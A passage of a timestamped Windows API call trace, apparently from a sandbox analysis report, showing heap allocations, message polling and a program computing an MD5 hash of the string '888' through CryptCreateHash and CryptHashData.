[0245.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0245.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0245.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0245.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0245.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0245.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0245.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0245.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0245.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0245.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0245.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0245.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0245.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0245.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0245.201] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0245.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0245.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0245.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0245.201] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0245.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0245.201] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0245.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0245.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0245.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0245.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0245.201] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0245.201] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0245.201] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0245.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e510d0 [0245.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0245.202] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0245.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0245.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0245.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0245.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0245.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0245.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0245.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0245.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0245.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0245.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0245.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0245.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0245.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0245.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0245.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0245.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0245.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0245.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0245.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0245.203] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0245.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0245.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0245.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0245.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0245.203] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0245.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0245.203] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e51358, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0245.204] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0245.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0245.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0245.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0245.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0245.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0245.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0245.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0245.204] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0245.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0245.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0245.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0245.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0245.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0245.204] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0245.205] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0245.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0245.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0245.205] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0245.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0245.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0245.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0245.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0245.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0245.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0245.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0245.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0245.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0245.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0245.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0245.205] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0245.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0245.206] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54e18, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0245.206] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0245.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0245.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0245.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0245.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0245.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0245.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0245.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0245.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0245.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0245.206] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0245.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0245.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0245.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0245.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0245.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0245.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0245.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0245.207] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0245.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0245.207] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54e98, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0245.207] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0245.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0245.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0245.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0245.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0245.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a08 [0245.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0245.207] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0245.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a08 | out: hHeap=0x970000) returned 1 [0245.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0245.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ec0 [0245.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0245.208] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0245.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0245.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0245.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0245.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0245.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0245.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0245.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0245.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0245.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0245.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0245.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0245.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0245.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0245.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0245.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0245.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0245.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0245.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0245.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0245.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0245.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0245.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0245.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0245.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0245.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0245.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0245.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0245.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0245.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0245.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0245.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0245.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977938 [0245.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0245.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0245.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0245.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0245.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0245.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0245.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0245.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0245.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0245.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0245.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0245.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0245.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0245.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0245.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0245.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0245.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0245.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0245.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0245.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0245.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0245.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0245.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0245.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0245.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0245.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0245.210] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0245.211] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0245.211] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e50fe0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0245.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0245.211] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0245.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0245.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0245.211] CryptHashData (hHash=0xa87490, pbData=0x2e54ed8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0245.211] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0245.211] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0245.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0245.212] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0245.212] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0245.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a08 | out: hHeap=0x970000) returned 1 [0245.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0245.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e512f8 [0245.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0245.212] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0245.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0245.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0245.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0245.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0245.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0245.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0245.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0245.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0245.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0245.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0245.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0245.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0245.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0245.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0245.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0245.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0245.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0245.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0245.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0245.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0245.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0245.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0245.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0245.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0245.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0245.213] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0245.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0245.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0245.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51340 [0245.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0245.213] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0245.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0245.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0245.213] HeapFree (in: hHeap=0x970000, 